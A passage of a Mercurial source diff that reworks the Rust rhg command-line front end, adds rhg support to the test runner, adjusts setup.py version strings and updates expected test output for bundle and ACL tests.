+ match &result { + Ok(_) => {} + Err(CommandError::Unsuccessful) => {} + Err(CommandError::Abort { + message, + detailed_exit_code: _, + }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = ui.write_stderr(&format_bytes!(b"{}\n", message)); + } } - ("debugrequirements", _) => { - commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui) + Err(CommandError::UnsupportedFeature { message }) => { + match on_unsupported { + OnUnsupported::Abort => { + let _ = ui.write_stderr(&format_bytes!( + b"unsupported feature: {}\n", + message + )); + } + OnUnsupported::AbortSilent => {} + OnUnsupported::Fallback { .. 
} => unreachable!(), + } } - _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } + std::process::exit(exit_code(&result, use_detailed_exit_code)) } -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> { - type Error = CommandError; +macro_rules! subcommands { + ($( $command: ident )+) => { + mod commands { + $( + pub mod $command; + )+ + } + + fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app + $( + .subcommand(commands::$command::args()) + )+ + } + + pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>; + + fn subcommand_run_fn(name: &str) -> Option<RunFn> { + match name { + $( + stringify!($command) => Some(commands::$command::run), + )+ + _ => None, + } + } + }; +} + +subcommands! { + cat + debugdata + debugrequirements + files + root + config + status +} + +pub struct CliInvocation<'a> { + ui: &'a Ui, + subcommand_args: &'a ArgMatches<'a>, + config: &'a Config, + /// References inside `Result` is a bit peculiar but allow + /// `invocation.repo?` to work out with `&CliInvocation` since this + /// `Result` type is `Copy`. + repo: Result<&'a Repo, &'a NoRepoInCwdError>, +} + +struct NoRepoInCwdError { + cwd: PathBuf, +} - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - Ok(commands::files::FilesCommand::new(rev)) +/// CLI arguments to be parsed "early" in order to be able to read +/// configuration before using Clap. Ideally we would also use Clap for this, +/// see <https://github.com/clap-rs/clap/discussions/2366>. +/// +/// These arguments are still declared when we do use Clap later, so that Clap +/// does not return an error for their presence. +struct EarlyArgs { + /// Values of all `--config` arguments. (Possibly none) + config: Vec<Vec<u8>>, + /// Value of the `-R` or `--repository` argument, if any. + repo: Option<Vec<u8>>, + /// Value of the `--cwd` argument, if any. 
+ cwd: Option<Vec<u8>>, +} + +impl EarlyArgs { + fn parse(args: impl IntoIterator<Item = OsString>) -> Self { + let mut args = args.into_iter().map(get_bytes_from_os_str); + let mut config = Vec::new(); + let mut repo = None; + let mut cwd = None; + // Use `while let` instead of `for` so that we can also call + // `args.next()` inside the loop. + while let Some(arg) = args.next() { + if arg == b"--config" { + if let Some(value) = args.next() { + config.push(value) + } + } else if let Some(value) = arg.drop_prefix(b"--config=") { + config.push(value.to_owned()) + } + + if arg == b"--cwd" { + if let Some(value) = args.next() { + cwd = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--cwd=") { + cwd = Some(value.to_owned()) + } + + if arg == b"--repository" || arg == b"-R" { + if let Some(value) = args.next() { + repo = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--repository=") { + repo = Some(value.to_owned()) + } else if let Some(value) = arg.drop_prefix(b"-R") { + repo = Some(value.to_owned()) + } + } + Self { config, repo, cwd } } } -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> { - type Error = CommandError; +/// What to do when encountering some unsupported feature. +/// +/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`. +enum OnUnsupported { + /// Print an error message describing what feature is not supported, + /// and exit with code 252. + Abort, + /// Silently exit with code 252. 
+ AbortSilent, + /// Try running a Python implementation + Fallback { executable: Vec<u8> }, +} + +impl OnUnsupported { + const DEFAULT: Self = OnUnsupported::Abort; - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - let files = match args.values_of("files") { - Some(files) => files.collect(), - None => vec![], - }; - Ok(commands::cat::CatCommand::new(rev, files)) + fn from_config(ui: &Ui, config: &Config) -> Self { + match config + .get(b"rhg", b"on-unsupported") + .map(|value| value.to_ascii_lowercase()) + .as_deref() + { + Some(b"abort") => OnUnsupported::Abort, + Some(b"abort-silent") => OnUnsupported::AbortSilent, + Some(b"fallback") => OnUnsupported::Fallback { + executable: config + .get(b"rhg", b"fallback-executable") + .unwrap_or_else(|| { + exit_no_fallback( + ui, + Self::Abort, + Err(CommandError::abort( + "abort: 'rhg.on-unsupported=fallback' without \ + 'rhg.fallback-executable' set." + )), + false, + ) + }) + .to_owned(), + }, + None => Self::DEFAULT, + Some(_) => { + // TODO: warn about unknown config value + Self::DEFAULT + } + } } } -impl<'a> TryFrom<&'a ArgMatches<'_>> - for commands::debugdata::DebugDataCommand<'a> -{ - type Error = CommandError; +const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"]; + +fn check_extensions(config: &Config) -> Result<(), CommandError> { + let enabled = config.get_section_keys(b"extensions"); + + let mut unsupported = enabled; + for supported in SUPPORTED_EXTENSIONS { + unsupported.remove(supported); + } - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args - .value_of("rev") - .expect("rev should be a required argument"); - let kind = match ( - args.is_present("changelog"), - args.is_present("manifest"), - ) { - (true, false) => DebugDataKind::Changelog, - (false, true) => DebugDataKind::Manifest, - (true, true) => { - unreachable!("Should not happen since options are exclusive") - } - (false, false) => { - 
unreachable!("Should not happen since options are required") - } - }; - Ok(commands::debugdata::DebugDataCommand::new(rev, kind)) + if let Some(ignored_list) = + config.get_simple_list(b"rhg", b"ignored-extensions") + { + for ignored in ignored_list { + unsupported.remove(ignored); + } + } + + if unsupported.is_empty() { + Ok(()) + } else { + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)", + join(unsupported, b", ") + ), + }) } } diff --git a/rust/rhg/src/ui.rs b/rust/rhg/src/ui.rs --- a/rust/rhg/src/ui.rs +++ b/rust/rhg/src/ui.rs @@ -49,11 +49,6 @@ stderr.flush().or_else(handle_stderr_error) } - - /// Write string line to stderr - pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> { - self.write_stderr(&format!("{}\n", s).as_bytes()) - } } /// A buffered stdout writer for faster batch printing operations. diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -419,9 +419,9 @@ ltag = sysstr(hg.run(ltagcmd)) changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag] changessince = len(hg.run(changessincecmd).splitlines()) - version = '%s+%s-%s' % (ltag, changessince, hgid) + version = '%s+hg%s.%s' % (ltag, changessince, hgid) if version.endswith('+'): - version += time.strftime('%Y%m%d') + version = version[:-1] + 'local' + time.strftime('%Y%m%d') elif os.path.exists('.hg_archival.txt'): kw = dict( [[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')] @@ -430,11 +430,13 @@ version = kw['tag'] elif 'latesttag' in kw: if 'changessincelatesttag' in kw: - version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw + version = ( + '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw + ) else: - version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw + version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw else: - version = kw.get('node', '')[:12] + version = '0+hg' + kw.get('node', 
'')[:12] if version: versionb = version @@ -451,20 +453,6 @@ ), ) -try: - oldpolicy = os.environ.get('HGMODULEPOLICY', None) - os.environ['HGMODULEPOLICY'] = 'py' - from mercurial import __version__ - - version = __version__.version -except ImportError: - version = b'unknown' -finally: - if oldpolicy is None: - del os.environ['HGMODULEPOLICY'] - else: - os.environ['HGMODULEPOLICY'] = oldpolicy - class hgbuild(build): # Insert hgbuildmo first so that files in mercurial/locale/ are found @@ -609,6 +597,12 @@ # and its build is not explictely disabled (for external build # as Linux distributions would do) if self.distribution.rust and self.rust: + if not sys.platform.startswith('linux'): + self.warn( + "rust extensions have only been tested on Linux " + "and may not behave correctly on other platforms" + ) + for rustext in ruststandalones: rustext.build('' if self.inplace else self.build_lib) @@ -823,6 +817,22 @@ if not os.path.exists(dest): shutil.copy(buf.value, dest) + # Also overwrite python3.dll so that hgext.git is usable. + # TODO: also handle the MSYS flavor + if sys.version_info[0] >= 3: + python_x = os.path.join( + os.path.dirname(fsdecode(buf.value)), + "python3.dll", + ) + + if os.path.exists(python_x): + dest = os.path.join( + os.path.dirname(self.hgtarget), + os.path.basename(python_x), + ) + + shutil.copy(python_x, dest) + if not pythonlib: log.warn( 'could not determine Python DLL filename; assuming pythonXY' @@ -1677,8 +1687,8 @@ # unicode on Python 2 still works because it won't contain any # non-ascii bytes and will be implicitly converted back to bytes # when operated on. 
-assert isinstance(version, bytes) -setupversion = version.decode('ascii') +assert isinstance(version, str) +setupversion = version extra = {} @@ -1706,7 +1716,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others', 'product_version': version, } ] @@ -1782,7 +1792,7 @@ setup( name='mercurial', version=setupversion, - author='Matt Mackall and many others', + author='Olivia Mackall and many others', author_email='mercurial@mercurial-scm.org', url='https://mercurial-scm.org/', download_url='https://mercurial-scm.org/release/', diff --git a/tests/common-pattern.py b/tests/common-pattern.py --- a/tests/common-pattern.py +++ b/tests/common-pattern.py @@ -20,7 +20,6 @@ br'phases%253Dheads%250A' br'pushkey%250A' br'remote-changegroup%253Dhttp%252Chttps%250A' - br'rev-branch-cache%250A' br'stream%253Dv2', # (the replacement patterns) br'$USUAL_BUNDLE_CAPS$', @@ -53,7 +52,6 @@ br'phases%3Dheads%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS$', @@ -70,8 +68,7 @@ br'listkeys%0A' br'phases%3Dheads%0A' br'pushkey%0A' - br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache', + br'remote-changegroup%3Dhttp%2Chttps', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_SERVER$', ), @@ -85,7 +82,6 @@ br'listkeys%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_NO_PHASES$', diff --git a/tests/flagprocessorext.py b/tests/flagprocessorext.py --- a/tests/flagprocessorext.py +++ b/tests/flagprocessorext.py @@ -31,28 +31,28 @@ return False -def noopdonothing(self, text, sidedata): +def noopdonothing(self, text): return (text, True) def noopdonothingread(self, text): - return (text, True, {}) + return (text, True) -def b64encode(self, text, sidedata): +def 
b64encode(self, text): return (base64.b64encode(text), False) def b64decode(self, text): - return (base64.b64decode(text), True, {}) + return (base64.b64decode(text), True) -def gzipcompress(self, text, sidedata): +def gzipcompress(self, text): return (zlib.compress(text), False) def gzipdecompress(self, text): - return (zlib.decompress(text), True, {}) + return (zlib.decompress(text), True) def supportedoutgoingversions(orig, repo): diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -140,9 +140,22 @@ """Return the match object if cmd executes successfully and its output is matched by the supplied regular expression. """ + + # Tests on Windows have to fake USERPROFILE to point to the test area so + # that `~` is properly expanded on py3.8+. However, some tools like black + # make calls that need the real USERPROFILE in order to run `foo --version`. + env = os.environ + if os.name == 'nt': + env = os.environ.copy() + env['USERPROFILE'] = env['REALUSERPROFILE'] + r = re.compile(regexp) p = subprocess.Popen( - cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT + cmd, + shell=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + env=env, ) s = p.communicate()[0] ret = p.returncode @@ -188,6 +201,11 @@ return 'CHGHG' in os.environ +@check("rhg", "running with rhg as 'hg'") +def has_rhg(): + return 'RHG_INSTALLED_AS_HG' in os.environ + + @check("cvs", "cvs client/server") def has_cvs(): re = br'Concurrent Versions System.*?server' @@ -591,7 +609,7 @@ return matchoutput("pylint --help", br"Usage:[ ]+pylint", True) -@check("clang-format", "clang-format C code formatter") +@check("clang-format", "clang-format C code formatter (>= 11)") def has_clang_format(): m = matchoutput('clang-format --version', br'clang-format version (\d+)') # style changed somewhere between 10.x and 11.x @@ -702,6 +720,12 @@ return os.path.isdir(os.path.join(t, "..", ".hg")) +@check("network-io", "whether tests are allowed to access 
3rd party services") +def has_test_repo(): + t = os.environ.get("HGTESTS_ALLOW_NETIO") + return t == "1" + + @check("curses", "terminfo compiler and curses module") def has_curses(): try: @@ -1034,7 +1058,7 @@ return matchoutput('sqlite3 -version', br'^3\.\d+') -@check('vcr', 'vcr http mocking library') +@check('vcr', 'vcr http mocking library (pytest-vcr)') def has_vcr(): try: import vcr @@ -1054,7 +1078,7 @@ return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)') -@check('black', 'the black formatter for python') +@check('black', 'the black formatter for python (>= 20.8b1)') def has_black(): blackcmd = 'black --version' version_regex = b'black, version ([0-9a-b.]+)' diff --git a/tests/logexceptions.py b/tests/logexceptions.py --- a/tests/logexceptions.py +++ b/tests/logexceptions.py @@ -1,6 +1,6 @@ # logexceptions.py - Write files containing info about Mercurial exceptions # -# Copyright 2017 Matt Mackall <mpm@selenic.com> +# Copyright 2017 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -5,6 +5,9 @@ hg, registrar, ) +from mercurial.utils import ( + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -18,10 +21,13 @@ Used for testing purpose """ - dest = repo.ui.expandpath(b'default') + dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0] peer = hg.peer(repo, {}, dest) - flogheads = peer.x_rfl_getflogheads(path) + try: + flogheads = peer.x_rfl_getflogheads(path) + finally: + peer.close() if flogheads: for head in flogheads: diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2,7 +2,7 @@ # # run-tests.py - Run a set of tests on Mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -301,6 +301,7 @@ while time.time() - start < timeout and p.returncode is None: time.sleep(0.1) p.timeout = True + vlog('# Timout reached for process %d' % p.pid) if p.returncode is None: terminate(p) @@ -540,6 +541,11 @@ action="store_true", help="show chg debug logs", ) + hgconf.add_argument( + "--rhg", + action="store_true", + help="install and use rhg Rust implementation in place of hg", + ) hgconf.add_argument("--compiler", help="compiler to build with") hgconf.add_argument( '--extra-config-opt', @@ -552,6 +558,7 @@ "--local", action="store_true", help="shortcut for --with-hg=<testdir>/../hg, " + "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, " "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set", ) hgconf.add_argument( @@ -580,6 +587,11 @@ help="use specified chg wrapper in place of hg", ) hgconf.add_argument( + "--with-rhg", + metavar="RHG", + help="use specified rhg Rust implementation in place of hg", + ) + hgconf.add_argument( "--with-hg", metavar="HG", help="test using specified hg script rather than a " @@ -667,13 +679,17 @@ parser.error('--rust cannot be used with --no-rust') if options.local: - if options.with_hg or options.with_chg: - parser.error('--local cannot be used with --with-hg or --with-chg') + if options.with_hg or options.with_rhg or options.with_chg: + parser.error( + '--local cannot be used with --with-hg or --with-rhg or --with-chg' + ) testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0]))) reporootdir = os.path.dirname(testdir) pathandattrs = [(b'hg', 'with_hg')] if options.chg: pathandattrs.append((b'contrib/chg/chg', 'with_chg')) + if options.rhg: + pathandattrs.append((b'rust/target/release/rhg', 'with_rhg')) for relpath, attr in pathandattrs: binpath = os.path.join(reporootdir, relpath) if os.name != 'nt' and not os.access(binpath, os.X_OK): @@ -696,6 +712,8 @@ if (options.chg or options.with_chg) and os.name == 'nt': parser.error('chg does not work on %s' % os.name) + if (options.rhg or 
options.with_rhg) and os.name == 'nt': + parser.error('rhg does not work on %s' % os.name) if options.with_chg: options.chg = False # no installation to temporary location options.with_chg = canonpath(_sys2bytes(options.with_chg)) @@ -704,12 +722,28 @@ and os.access(options.with_chg, os.X_OK) ): parser.error('--with-chg must specify a chg executable') + if options.with_rhg: + options.rhg = False # no installation to temporary location + options.with_rhg = canonpath(_sys2bytes(options.with_rhg)) + if not ( + os.path.isfile(options.with_rhg) + and os.access(options.with_rhg, os.X_OK) + ): + parser.error('--with-rhg must specify a rhg executable') if options.chg and options.with_hg: # chg shares installation location with hg parser.error( '--chg does not work when --with-hg is specified ' '(use --with-chg instead)' ) + if options.rhg and options.with_hg: + # rhg shares installation location with hg + parser.error( + '--rhg does not work when --with-hg is specified ' + '(use --with-rhg instead)' + ) + if options.rhg and options.chg: + parser.error('--rhg and --chg do not work together') if options.color == 'always' and not pygmentspresent: sys.stderr.write( @@ -1338,6 +1372,7 @@ env['TESTNAME'] = self.name env['HOME'] = _bytes2sys(self._testtmp) if os.name == 'nt': + env['REALUSERPROFILE'] = env['USERPROFILE'] # py3.8+ ignores HOME: https://bugs.python.org/issue36264 env['USERPROFILE'] = env['HOME'] formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1]) @@ -2278,7 +2313,7 @@ if test.path.endswith(b'.t'): rename(test.errpath, test.path) else: - rename(test.errpath, '%s.out' % test.path) + rename(test.errpath, b'%s.out' % test.path) accepted = True if not accepted: self.faildata[test.name] = b''.join(lines) @@ -3098,6 +3133,25 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) + # configure fallback and replace "hg" command by "rhg" + rhgbindir = self._bindir + if 
self.options.rhg or self.options.with_rhg: + # Affects hghave.py + osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1' + # Affects configuration. Alternatives would be setting configuration through + # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include + # `--config` but that disrupts tests that print command lines and check expected + # output. + osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback' + osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join( + self._bindir, self._hgcommand + ) + if self.options.rhg: + self._hgcommand = b'rhg' + elif self.options.with_rhg: + rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg)) + self._hgcommand = os.path.basename(self.options.with_rhg) + osenvironb[b"BINDIR"] = self._bindir osenvironb[b"PYTHON"] = PYTHON @@ -3116,6 +3170,8 @@ path.insert(2, realdir) if chgbindir != self._bindir: path.insert(1, chgbindir) + if rhgbindir != self._bindir: + path.insert(1, rhgbindir) if self._testdir != runtestdir: path = [self._testdir] + path if self._tmpbindir != self._bindir: @@ -3335,6 +3391,9 @@ if self.options.chg: assert self._installdir self._installchg() + if self.options.rhg: + assert self._installdir + self._installrhg() log( 'running %d tests using %d parallel processes' @@ -3696,6 +3755,33 @@ sys.stdout.write(out) sys.exit(1) + def _installrhg(self): + """Install rhg into the test environment""" + vlog('# Performing temporary installation of rhg') + assert os.path.dirname(self._bindir) == self._installdir + assert self._hgroot, 'must be called after _installhg()' + cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % { + b'make': b'make', # TODO: switch by option or environment? 
+ b'prefix': self._installdir, + } + cwd = self._hgroot + vlog("# Running", cmd) + proc = subprocess.Popen( + cmd, + shell=True, + cwd=cwd, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + out, _err = proc.communicate() + if proc.returncode != 0: + if PYTHON3: + sys.stdout.buffer.write(out) + else: + sys.stdout.write(out) + sys.exit(1) + def _outputcoverage(self): """Produce code coverage output.""" import coverage diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -106,7 +106,9 @@ _flagserrorclass = simplestoreerror - def __init__(self, svfs, path): + def __init__(self, repo, svfs, path): + self.nullid = repo.nullid + self._repo = repo self._svfs = svfs self._path = path @@ -300,7 +302,7 @@ text = rawtext else: r = flagutil.processflagsread(self, rawtext, flags) - text, validatehash, sidedata = r + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) @@ -446,6 +448,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): # TODO this will probably break on some ordering options. 
nodes = [n for n in nodes if n != nullid] @@ -459,6 +462,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta @@ -550,7 +554,7 @@ if node in self._indexbynode: if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -560,12 +564,12 @@ else: text = mdiff.patch(self.revision(deltabase), delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, linkrev, p1, p2, flags ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty @@ -687,7 +691,7 @@ class simplestorerepo(repo.__class__): def file(self, f): - return filestorage(self.svfs, f) + return filestorage(repo, self.svfs, f) repo.__class__ = simplestorerepo diff --git a/tests/svnxml.py b/tests/svnxml.py --- a/tests/svnxml.py +++ b/tests/svnxml.py @@ -15,6 +15,7 @@ e['revision'] = entry.getAttribute('revision') e['author'] = xmltext(entry.getElementsByTagName('author')[0]) e['msg'] = xmltext(entry.getElementsByTagName('msg')[0]) + e['date'] = xmltext(entry.getElementsByTagName('date')[0]) e['paths'] = [] paths = entry.getElementsByTagName('paths') if paths: @@ -42,7 +43,7 @@ except AttributeError: fp = sys.stdout for e in entries: - for k in ('revision', 'author', 'msg'): + for k in ('revision', 'author', 'date', 'msg'): fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8')) for path, action, fpath, frev in sorted(e['paths']): frominfo = b'' diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -109,14 +109,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: 
"check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -175,14 +175,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -204,6 +204,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -244,14 +245,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) 
streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -283,6 +284,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -323,14 +325,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -359,6 +361,7 @@ bundle2-input-bundle: 5 parts total transaction abort! 
rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374") no rollback information available 0:6675d58eff77 @@ -393,14 +396,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -468,14 +471,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -540,14 +543,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + 
bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -617,14 +620,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -691,14 +694,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - 
